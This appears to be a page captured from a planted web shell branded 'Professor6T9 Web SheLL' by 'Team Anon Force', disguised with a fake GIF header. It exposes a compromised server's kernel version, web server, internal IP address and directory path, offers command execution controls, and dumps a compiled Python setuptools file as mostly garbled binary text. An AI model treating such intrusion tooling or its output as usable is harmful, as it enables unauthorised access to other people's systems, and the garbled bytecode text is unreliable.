GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : bdist.cpython-38.pyc
U �}�h� � @ sh d Z ddlZddlZddlmZ ddlmZmZ ddlm Z dd� Z G d d � d e�ZG dd� de�Z dS ) zidistutils.command.bdist Implements the Distutils 'bdist' command (create a built [binary] distribution).� N� )�Command)�DistutilsOptionError�DistutilsPlatformError)�get_platformc C sP ddl m} g }tjD ]"}|�d| dtj| d f� q| |�}|�d� dS )zAPrint list of available formats (arguments to "--format" option).r )�FancyGetopt�formats=N� z'List of available distribution formats:)�fancy_getoptr �bdist�format_commands�append� print_help)r �formats�formatZpretty_printer� r �J/tmp/pip-target-k_nuic9h/lib/python/setuptools/_distutils/command/bdist.py�show_formats s r c @ s e Zd Zdd� ZdS )� ListCompatc C s t jdtdd� d S )Nz4format_commands is now a dict. append is deprecated.r )� stacklevel)�warnings�warn�DeprecationWarning)�self�itemr r r r s �zListCompat.appendN)�__name__� __module__�__qualname__r r r r r r s r c @ s� e Zd ZdZdddde� � d�fddd d dgZdgZd ddefgZdZ ddd�Z edddddddd��ZeZ dd� Zdd� Zd d!� ZdS )"r z$create a built (binary) distribution)zbdist-base=�bz4temporary directory for creating built distributionsz plat-name=�pz8platform name to embed in generated filenames [default: �])r Nz/formats for distribution (comma-separated list))z dist-dir=�dz=directory to put final built distributions in [default: dist])� skip-buildNz2skip rebuilding everything (for testing/debugging))zowner=�uz@Owner name used when creating a tar file [default: current user])zgroup=�gzAGroup name used when creating a tar file [default: current group]r"